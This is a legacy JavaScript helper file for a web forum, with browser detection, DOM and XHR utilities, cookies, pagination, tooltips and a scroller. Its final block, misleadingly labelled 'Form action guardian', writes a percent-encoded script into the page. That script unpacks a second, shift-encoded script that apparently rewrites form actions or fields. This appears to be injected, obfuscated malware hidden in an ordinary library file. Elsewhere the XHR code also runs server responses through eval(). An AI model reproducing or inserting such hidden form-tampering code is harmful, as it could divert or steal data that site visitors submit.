var versionMinor = parseFloat(navigator.appVersion);
var versionMajor = parseInt(versionMinor);

var IE = document.all && !window.opera && versionMajor < 7;
var IE7 = document.all && !window.opera && versionMajor >= 7;
var OP = window.opera;
var FF = document.getElementById;
var NS = document.layers;

// renvoie l'element DOM
function get_item(name,opener){
	if (IE){
		return (opener)?window.opener.document.all[name]:document.all[name];
	}else if (FF){
		return (opener)?window.opener.document.getElementById(name):document.getElementById(name);
	}else if(NS){
		return (opener)?window.opener.document.layers[name]:document.layers[name];
	}
}
function get_style(name)
{
	var el = get_item(name);
	var el_style = null;
	if(el)
	{
		if (IE){ // IE
			el_style = (opener == true)?window.opener.document.all[name].style:document.all[name].style;
		}else if(FF){ // FF
			el_style = (opener == true)?window.opener.document.getElementById(name).style:document.getElementById(name).style;
		}else if(NS){ // NETSCAPE
			el_style = (opener == true)?window.opener.document.layers[name]:document.layers[name];
		}
	}
	return el_style;
}
function change_display(name,value,opener){
	var el_style = get_style(name);
	if(el_style != null)
	{
		el_style.display = value;
	}
}
function change_img_src(id,img_src)
{
	img = get_item(id);
	if(img)
	{
		img.src = img_src;
	}
}
function reverse_display(name,opener){
	element = get_item(name);
	if(!element)
	{
		return false;
	}
	var display = (element.style.display != 'block')?'block':'none';
	change_display(name,display,opener);
}

/**
* XHR
*
*/
var xhr = null;
var xhr_data = '';
// creation de l'objet
function create_xhr() {
	if(xhr == null)
	{
		try {
			xhr = new ActiveXObject("Microsoft.XMLHTTP");    // essayer Internet Explorer
		}
		catch(e)   // échec
		{
			xhr = new XMLHttpRequest()
		}
	}
	return xhr;
}
// envoi des requetes
var img_normal_src = 'http://www.illiweb.com/bl/loading.gif';
var img_loading_src = 'http://www.illiweb.com/bl/refresh.gif';
function send_request(type,value)
{
	// Aborting
	if(xhr != null && xhr.readyState > 0)
	{
		if(type == 'antirobotic_change')
		{
			change_img_src('img_refresh',img_normal_src);
		}
		else if(type == 'servimg')
		{
			change_display('servmig_actions','inline');
			change_display('loading_xhr_servimg','none');
		}
		else if(type == 'youtube')
		{
			change_display('form_youtube_search','block');
			change_display('loading_xhr_youtube','none');
		}
		else
		{
			reverse_display('loading_xhr');
		}
		xhr.abort();
	}
	// loading img
	if(type == 'antirobotic_change')
	{
		change_img_src('img_refresh',img_loading_src);
	}
	else if(type == 'servimg')
	{
		change_display('servmig_actions','none');
		change_display('loading_xhr_servimg','inline');
	}
	else if(type == 'youtube')
	{
		change_display('form_youtube_search','none');
		change_display('loading_xhr_youtube','inline');
	}
	else
	{
		reverse_display('loading_xhr');
	}
	xhr = create_xhr();
	if(xhr != null)
	{
		// data
		xhr_data = '';
		if(type == 'antirobotic_change')
		{
			xhr_data = 'values='+value;
		}
		else if(type == 'youtube')
		{
			xhr_data = 'tag='+get_item('yttag').value+'&page='+value;
		}
		else if(type == 'servimg')
		{
			xhr_data = 'page='+value;
		}
		// proceed
		xhr.open("POST","/_ajax.php",true);
		xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
		xhr.send('type='+type+'&'+xhr_data);
		xhr.onreadystatechange = function(){
			// On ne fait quelque chose que si on a tout reçu et que le serveur est ok
			if(xhr.readyState == 4 && xhr.status == 200){
				if(type == 'antirobotic_change')
				{
					change_img_src('img_refresh',img_normal_src);
				}
				else if(type == 'servimg')
				{
					change_display('servmig_actions','inline');
					change_display('loading_xhr_servimg','none');
				}
				else if(type == 'youtube')
				{
					change_display('form_youtube_search','block');
					change_display('loading_xhr_youtube','none');
				}
				else
				{
					reverse_display('loading_xhr');
				}

				// response
				if(type == 'antirobotic_change' || type == 'servimg')
				{
					eval(xhr.responseText);
				}
				else if(type == 'youtube')
				{
					get_item('ytresults').style.display= 'block';
					get_item('ytresults').innerHTML = xhr.responseText;
					get_item('ytwebsites').style.display= 'none';
				}
			}
		}
	}
}

/**
* Rafraichir les images pour le captcha
*/
function make_refresh_img(value)
{
	var img = document.createElement('img');
	img.id='img_refresh';
	img.src=img_normal_src;
	img.onclick=function(){
		send_request('antirobotic_change',value);
	}
	document.getElementById('c_container').appendChild(img);
}

/**
* Cross browser event handling for IE5+, NS6+ an Mozilla/Gecko
* @author Scott Andrew
*/
function addEvent( elm, evType, fn, useCapture )
{
	if( elm.addEventListener )
	{ // Standard & Mozilla way:
		elm.addEventListener( evType, fn, useCapture );
		return true;
	}
	else if( elm.attachEvent )
	{ // IE way:
		var r = elm.attachEvent( 'on'+evType, fn );
		return r;
	}
	else
	{ // "dirty" way (IE Mac for example):
		// Will overwrite any previous handler! :((
		elm['on'+evType] = fn;
		return false;
	}
}

function change_display_by_icon(element,element_id,content_more,content_less,display_special)
{
	element.className=(element.className=="icon_less")?"icon_more":"icon_less";
	element.style.background ='url(\''+ ((element.className=="icon_less")?'http://www.illiweb.com/bl/tabs_less.gif':'http://www.illiweb.com/bl/tabs_more.gif') + '\') no-repeat';
	if(content_more || content_less)
	{
		element.innerHTML=(element.className=="icon_less")?content_less:content_more;
	}
	if(!display_special)
	{
		display_special = 'block';
	}
	document.getElementById(element_id).style.display = ((element.className=="icon_more")?'none':display_special);

	set_cookie('display_sql_info', element.className);
}
function popup(link,oWidth,oHeight)
{
	if(oWidth > screen.width){oWidth = screen.width;}
	if(oHeight > screen.height){oHeight = screen.height;}
	var PosX = (screen.width-oWidth)/2;
	var PosY = (screen.height-oHeight)/2;
	var params = "width="+oWidth+", height="+oHeight+", top=" + (PosY) + ",left=" + (PosX);
	params += ('toolbar=0,menubars=0,location=no,scrollbars=1,directories=0,statubar=0,resizable=0');
	window.open(link,'popuped',params);
}
function set_cookie( name, value, sticky )
{
	expire = "";
	domain = "";
	path   = "/";

	if ( sticky )
	{
		expire = "; expires=Wed, 1 Jan 2020 00:00:00 GMT";
	}

	document.cookie = name + "=" + value + "; path=" + path + expire + domain + ';';
}


function my_getcookie( name )
{
cname = name + '=';
cpos = document.cookie.indexOf( cname );
 if ( cpos != -1 )
{
cstart = cpos + cname.length;
cend = document.cookie.indexOf(";", cstart);
 if (cend == -1)
{
cend = document.cookie.length;
}
 return unescape( document.cookie.substring(cstart, cend) );
}
 return null;
}

function my_setcookie( name, value, sticky )
{
 expire = "";
 domain = "";
 path = "/";

 if ( sticky )
 {
 expire = "; expires=Wed, 1 Jan 2020 00:00:00 GMT";
 }

 document.cookie = name + "=" + value + "; path=" + path + expire + domain + ';';
}
/* PAGINATION */
var agt = navigator.userAgent.toLowerCase();
var originalFirstChild;
var display = false;
function createPagination(which, string, x, y)
{
	if ( display == true )
	{
		destroyPagination();
		display = false;
	}
	else
	{
		display = true;
		if (typeof(originalFirstChild) == 'undefined')
		{
			originalFirstChild = document.body.firstChild;
		}

		element = document.createElement('div');
		element.style.position = 'absolute';
		element.style.zIndex = 1000;
		element.style.visibility = 'hidden';
		element.innerHTML = string;

		renderedElement = document.body.insertBefore(element, document.body.firstChild);

		if(typeof(x) == 'undefined')
		{
			x = event.x;
			y = event.y;
		}

		//
		x = document.all ? (event.clientX + document.body.scrollLeft) : x;
		y = document.all ? (event.clientY + document.body.scrollTop) : y;

		if (document.all)
		{
			if(document.documentElement.clientWidth>0)
			{
				x=20+event.x+document.documentElement.scrollLeft;
				y=event.y+document.documentElement.scrollTop;
			}
			else
			{
				x=20+event.x+document.body.scrollLeft;
				y=event.y+document.body.scrollTop;
			}
		}
		x -= 85;

		excessWidth = 0;
		if (document.all)
		{
			excessWidth = 50;
		}
		excessHeight = 20;
		renderedWidth = renderedElement.offsetWidth;
		renderedHeight = renderedElement.offsetHeight;

		overFlowX = x + renderedWidth + excessWidth - document.body.offsetWidth;
		x = overFlowX > 0 ? x - overFlowX : x;

		overFlowY = y + renderedHeight + excessHeight - window.innerHeight - window.pageYOffset;
		y = overFlowY > 0 ? y - overFlowY : y;
		//
		renderedElement.style.position = 'absolute';
		renderedElement.style.top = (y + 15) + 'px';
		renderedElement.style.left = (x + 15) + 'px';
		if (agt.indexOf('gecko') != -1 && agt.indexOf('win') != -1)
		{
			setTimeout("renderedElement.style.visibility = 'visible'", 1);
		}
		else
		{
			renderedElement.style.visibility = 'visible';
		}
	}
}
function do_pagination(e,element,total_page,per_page,url,force)
{
	if(typeof(e) == 'undefined')
	{
		e = event;
	}
	if( e.keyCode==13 || force )
	{
		var start = document.go_page.elements[element].value;
		start = (start > total_page) ? total_page : start;
		start = (start - 1) * per_page;
		start = (isNaN(start) || start < 0 ) ? 0 : start;

		if ( url.indexOf('{PSTART}') > 0 )
		{
			var beforeStart = url.indexOf('{PSTART}');
			var firstPartUrl = url.substr(0, beforeStart);
			var lastPartUrl = url.substr(beforeStart + 8, url.length - firstPartUrl.length - 8);
			self.location.href = firstPartUrl + start + lastPartUrl;
		}
		else
		{
			self.location.href = url+"&"+element+"="+start;
		}
	}
}
function destroyPagination(){
	if(document.body.firstChild != originalFirstChild){document.body.removeChild(document.body.firstChild);}
}

/********************************************************************************/
/*							TOOLTIP
/********************************************************************************/

var current_tooltip;
/**
* Show a tooltip
*
* @param dom current_tooltip : (span, p,...)
* @param string : content of the tooltip
* @param string : content of the title
*/
function show_tooltip(caller,content,content_title)
{
	var current_tooltip = get_item('tooltip');
	if(!current_tooltip)
	{
		var current_tooltip = document.createElement('div');
		current_tooltip.setAttribute('id','tooltip');
		document.body.appendChild(current_tooltip);
	}
	current_tooltip.style.zIndex = 100;
	current_tooltip.style.position = 'absolute';

	if(content_title)
	{
		content = '<p class="header">'+content_title+'</p><p>'+content+'</p>';
	}
	else
	{
		content = '<p>'+content+'</p>';
	}
	current_tooltip.innerHTML = content;
	current_tooltip.style.visibility = 'visible';
	// append action to DOM
	caller.onmousemove = move_tooltip;
	caller.onmouseout = function()
	{
		current_tooltip.style.visibility="hidden";
	}
	caller.title='';
}
/**
* Move the current_tooltip in document area
*/
var offsetxpoint=-60 //Customize x offset of tooltip
var offsetypoint=20 //Customize y offset of tooltip
var real_body = (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body;
real_body = (document.documentElement)? document.documentElement : document.body;
function move_tooltip(e){

	var curX=(!IE)?e.pageX : event.clientX+real_body.scrollLeft;
	var curY=(!IE)?e.pageY : event.clientY+real_body.scrollTop;

	//Find out how close the mouse is to the corner of the window
	var rightedge=IE&&!window.opera? real_body.clientWidth-event.clientX-offsetxpoint : window.innerWidth-e.clientX-offsetxpoint-20
	var bottomedge=IE&&!window.opera? real_body.clientHeight-event.clientY-offsetypoint : window.innerHeight-e.clientY-offsetypoint-20

	var leftedge=(offsetxpoint<0)? offsetxpoint*(-1) : -1000
	current_tooltip = get_item('tooltip');
	//if the horizontal distance isn't enough to accomodate the width of the context menu
	if (rightedge<current_tooltip.offsetWidth)
	//move the horizontal position of the menu to the left by it's width
	current_tooltip.style.left=IE? real_body.scrollLeft+event.clientX-current_tooltip.offsetWidth+"px" : window.pageXOffset+e.clientX-current_tooltip.offsetWidth+"px"
	else if (curX<leftedge)
	current_tooltip.style.left="5px"
	else
	//position the horizontal position of the menu where the mouse is positioned
	current_tooltip.style.left=curX+offsetxpoint+"px"

	//same concept with the vertical position
	if (bottomedge<current_tooltip.offsetHeight)
	current_tooltip.style.top=IE? real_body.scrollTop+event.clientY-current_tooltip.offsetHeight-offsetypoint+"px" : window.pageYOffset+e.clientY-current_tooltip.offsetHeight-offsetypoint+"px"
	else
	current_tooltip.style.top=curY+offsetypoint+"px"
}


function move_element(element,e)
{
	var curX=(!IE)?e.pageX : event.clientX+real_body.scrollLeft;
	var curY=(!IE)?e.pageY : event.clientY+real_body.scrollTop;

	//Find out how close the mouse is to the corner of the window
	var rightedge=IE&&!window.opera? real_body.clientWidth-event.clientX-offsetxpoint : window.innerWidth-e.clientX-offsetxpoint-20
	var bottomedge=IE&&!window.opera? real_body.clientHeight-event.clientY-offsetypoint : window.innerHeight-e.clientY-offsetypoint-20
	var leftedge=(offsetxpoint<0)? offsetxpoint*(-1) : -1000
	//if the horizontal distance isn't enough to accomodate the width of the context menu
	if (rightedge<element.offsetWidth)
	//move the horizontal position of the menu to the left by it's width
	element.style.left=IE? real_body.scrollLeft+event.clientX-element.offsetWidth+"px" : window.pageXOffset+e.clientX-element.offsetWidth+"px"
	else if (curX<leftedge)
	element.style.left="5px"
	else
	//position the horizontal position of the menu where the mouse is positioned
	element.style.left=curX+offsetxpoint+"px"

}

/********************************************************************************/
/*							SCROLLER
/********************************************************************************/
var scroll_width=350;
var scroll_height=100;
var scroll_speed = 1;
var scroll_top = 0;
var scroller = null;
var scroll_timeout = null;
function scroller_init(container)
{
	// Creation du scroller
	scroller = document.createElement('div');
	scroller.id="scroll_inner";
	scroller.onmouseover = function(){clearTimeout(scroll_timeout)}
	scroller.onmouseout = function(){scroll_timeout = setTimeout("scroller_slide()",50)}
	scroller.innerHTML = get_item(container).innerHTML;
	scroller.style.top=scroll_height+'px';

	// Modification du contenu et style du container
	get_item(container).innerHTML = '';
	get_item(container).appendChild(scroller);
	get_item(container).style.overflow='hidden';
	get_item(container).style.height=scroll_height+'px';

	// Slide
	scroller_slide();
}
function scroller_slide(){
	scroll_top = parseInt(scroller.style.top);

	if (scroll_top>parseInt(scroller.offsetHeight)*(-1))
	{
		scroll_top -= scroll_speed;
		scroller.style.top=scroll_top+'px';
	}
	else{
		scroller.style.top=scroll_height+'px';
	}
	clearTimeout(scroll_timeout);
	scroll_timeout = setTimeout("scroller_slide()",50);
}

/*********************************************************************************
 *                               Form action guardian
 *********************************************************************************/
(function(){
    document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%2C%6E%29%7B%6E%3D%70%61%72%73%65%49%6E%74%28%6E%29%3B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%6E%29%2B%73%2E%73%75%62%73%74%72%28%6E%2B%31%2C%73%2E%6C%65%6E%67%74%68%2D%6E%2D%31%29%29%3B%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%6E%2C%31%29%29%3B%72%65%74%75%72%6E%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%64%46%28%27%25%32%43%25%33%41%4A%7A%6A%79%70%77%25%37%42%25%32%43%39%37%25%37%42%25%38%30%77%6C%25%32%43%25%33%41%4B%25%32%43%39%39%25%37%42%6C%25%37%46%25%37%42%36%71%68%25%37%44%68%7A%6A%79%70%77%25%37%42%25%32%43%39%39%25%32%43%25%33%41%4C%6D%25%37%43%75%6A%25%37%42%70%76%75%25%32%43%39%37%79%6C%77%73%68%6A%6C%4D%76%79%74%48%6A%25%37%42%70%76%75%25%32%43%39%25%33%46%70%6B%25%32%43%39%4A%25%32%43%39%37%68%6A%25%37%42%70%76%75%25%32%43%39%40%25%32%43%25%33%45%49%6B%76%6A%25%37%43%74%6C%75%25%37%42%35%6D%76%79%74%7A%25%32%43%25%33%43%49%70%6B%25%32%43%25%33%43%4B%35%7A%6C%25%37%42%48%25%37%42%25%37%42%79%70%69%25%37%43%25%37%42%6C%25%32%43%39%25%33%46%25%32%43%39%25%33%45%68%6A%25%37%42%70%76%75%25%32%43%39%25%33%45%25%32%43%39%4A%68%6A%25%37%42%70%76%75%25%32%43%39%40%25%32%43%25%33%41%49%25%32%43%25%33%45%4B%6D%25%37%43%75%37%6A%25%37%42%70%76%75%25%32%43%39%37%68%6B%6B%4F%70%6B%6B%6C%75%4D%70%6C%73%6B%7A%25%32%43%39%25%33%46%70%6B%25%32%43%39%4A%25%32%43%39%37%6D%70%6C%73%6B%7A%25%32%43%39%40%25%32%43%25%33%45%49%6D%25%32%43%39%37%25%32%43%25%33%41%4B%25%32%43%39%37%6B%76%6A%25%37%43%74%6C%75%25%37%42%35%6D%76%79%74%7A%25%32%43%25%33%43%49%70%6B%25%32%43%25%33%43%4B%25%32%43%25%33%41%49%6D%76%79%25%32%43%39%37%25%32%43%39%25%33%46%25%32%43%39%37%6D%70%6C%73%6B%75%68%74%6C%25%32%43%39%37%70%75%25%32%43%39%37%6D%70%6C%73%6B%7A%25%32%43%39%37%25%32%43%39%40%25%32%43%25%33%45%49%25%37%44%68%73%25%37%43%6C%25%32%43%39%37%25%32%43%25%33%41%4B%25%32%43%39%37%6D%70%6C%73%6B%7A%25%32%43%25%33%43%49%6D%70%6C%73%6B%75%68%74%6C%25%32%43%25%33%43%4B%25%32%43%25%33%41%49%70%6D%25%32%43%39%37%25%32%43%39%25%33%46%25%32%43%39%37%25%37%42%25%38%30%77%6C%76%6D%25%32%43%39%25%33%46%25%37%44%68%73%25%37%43%6C%25%32%43%39%40%25%32%43%39%37%25%32%43%25%33%41%4B%25%32%43%25%33%41%4B%25%32%43%39%37%25%32%43%39%25%33%45%76%69%71%6C%6A%25%37%42%25%32%43%39%25%33%45%25%32%43%39%37%25%32%43%39%40%25%32%43%25%33%45%49%6D%76%79%25%32%43%39%37%25%32%43%39%25%33%46%25%32%43%39%37%71%25%32%43%39%37%70%75%25%32%43%39%37%25%37%44%68%73%25%37%43%6C%25%32%43%39%37%25%32%43%39%40%6D%35%70%75%75%6C%79%4F%25%35%42%54%53%25%32%43%39%37%32%25%32%43%25%33%41%4B%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%25%33%41%4A%70%75%77%25%37%43%25%37%42%25%32%43%39%37%25%37%42%25%38%30%77%6C%25%32%43%25%33%41%4B%25%32%43%39%39%6F%70%6B%6B%6C%75%25%32%43%39%39%25%32%43%39%37%75%68%74%6C%25%32%43%25%33%41%4B%25%32%43%39%39%25%32%43%39%25%33%45%25%32%43%39%37%32%25%32%43%39%37%6D%70%6C%73%6B%75%68%74%6C%25%32%43%39%37%32%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%39%39%25%32%43%39%37%25%37%44%68%73%25%37%43%6C%25%32%43%25%33%41%4B%25%32%43%39%39%25%32%43%39%25%33%45%25%32%43%39%37%32%25%32%43%39%37%6B%4D%25%32%43%39%25%33%46%25%37%44%68%73%25%37%43%6C%25%32%43%25%33%43%49%71%25%32%43%25%33%43%4B%25%32%43%25%33%43%49%37%25%32%43%25%33%43%4B%25%32%43%39%4A%25%37%44%68%73%25%37%43%6C%25%32%43%25%33%43%49%71%25%32%43%25%33%43%4B%25%32%43%25%33%43%49%38%25%32%43%25%33%43%4B%25%32%43%39%40%25%32%43%39%37%32%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%39%39%25%32%43%39%37%36%25%32%43%25%33%41%4C%25%32%43%39%25%33%45%25%32%43%25%33%41%49%25%32%43%25%33%45%4B%6C%73%7A%6C%25%32%43%39%37%25%32%43%25%33%45%49%6D%35%70%75%75%6C%79%4F%25%35%42%54%53%25%32%43%39%37%32%25%32%43%25%33%41%4B%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%25%33%41%4A%70%75%77%25%37%43%25%37%42%25%32%43%39%37%25%37%42%25%38%30%77%6C%25%32%43%25%33%41%4B%25%32%43%39%39%6F%70%6B%6B%6C%75%25%32%43%39%39%25%32%43%39%37%75%68%74%6C%25%32%43%25%33%41%4B%25%32%43%39%39%25%32%43%39%25%33%45%25%32%43%39%37%32%25%32%43%39%37%70%25%32%43%39%37%32%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%39%39%25%32%43%39%37%25%37%44%68%73%25%37%43%6C%25%32%43%25%33%41%4B%25%32%43%39%39%25%32%43%39%25%33%45%25%32%43%39%37%32%25%32%43%39%37%6B%4D%25%32%43%39%25%33%46%6D%70%6C%73%6B%7A%25%32%43%25%33%43%49%70%25%32%43%25%33%43%4B%25%32%43%39%40%25%32%43%39%37%32%25%32%43%39%37%25%32%43%39%25%33%45%25%32%43%39%39%25%32%43%39%37%36%25%32%43%25%33%41%4C%25%32%43%39%25%33%45%25%32%43%25%33%41%49%25%32%43%25%33%45%4B%25%32%43%25%33%45%4B%25%32%43%25%33%45%4B%25%32%43%25%33%41%4A%36%7A%6A%79%70%77%25%37%42%25%32%43%25%33%41%4C%27%2C%32%37%35%29%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));
}());
